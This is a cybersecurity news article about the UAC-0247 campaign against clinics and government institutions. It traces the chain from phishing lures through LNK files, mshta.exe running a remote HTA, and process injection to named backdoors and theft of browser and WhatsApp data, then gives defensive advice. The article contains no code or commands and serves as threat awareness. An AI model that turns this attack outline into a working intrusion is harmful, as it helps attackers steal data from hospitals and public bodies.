UAC-0247 Cyber Campaign Targets Healthcare and Government with Advanced Data-Theft Malware

Clinics and public institutions hit by multi-stage malware stealing browser data and WhatsApp information

Targeted Attack on Critical Sectors

The UAC-0247 threat group is actively targeting government and healthcare organizations. Clinics and emergency hospitals are primary victims. The campaign ran between March and April 2026.

Attackers use trust-based lures to increase success. They disguise emails as humanitarian aid proposals. This approach pushes victims to act quickly.

How the Attack Begins

The attack starts with a phishing email. It contains a link that looks safe. However, the link redirects users to a compromised or fake website.

Some websites exploit cross-site scripting (XSS). Others are AI-generated to look legitimate. In both cases, the goal remains the same—trigger a malicious download.

Victims download a Windows Shortcut (LNK) file without realizing the risk.

Multi-Stage Malware Execution

The LNK file launches a malicious process using "mshta.exe." This Windows utility runs a remote HTML Application (HTA).

The HTA shows a fake form to distract the user. Meanwhile, it silently downloads a malicious payload. The malware injects itself into trusted processes like "runtimeBroker.exe."

This technique helps attackers avoid detection.

Advanced Tools and Payloads

The attackers deploy multiple tools to control infected systems.

RAVENSHELL creates a reverse connection to the attacker’s server. It allows remote command execution through "cmd.exe."

AGINGFLY acts as the main backdoor. It gives attackers full control over the system. It can log keystrokes, run commands, and download files.

SILENTLOOP maintains persistence. It updates configurations and fetches command server details from Telegram.

Data Theft and Lateral Movement

Once inside, attackers expand their access.

They use tools to extract saved passwords and cookies from Chromium-based browsers. They also target WhatsApp data using forensic extraction tools.

At the same time, they scan networks and create tunnels. This allows them to move across systems without detection.

Expanding Attack Surface

In some cases, attackers used messaging platforms like Signal. They distributed malicious ZIP files to deliver payloads.

Evidence suggests possible targeting of defense-related entities. This increases the severity of the campaign.

How to Defend Against UAC-0247

Organizations must take proactive steps to reduce risk.

Restrict execution of LNK, HTA, and script files. Monitor the use of tools like "mshta.exe" and "powershell.exe."

Additionally, focus on behavior-based detection. Identify unusual activity across systems and users.

Train employees to question unexpected emails. Especially those that create urgency or request downloads.

Final Insight

UAC-0247 shows how attackers combine social engineering with advanced malware. They use trusted tools to bypass security controls.

As a result, traditional defenses struggle to detect these attacks. Organizations must adapt quickly and strengthen their security posture.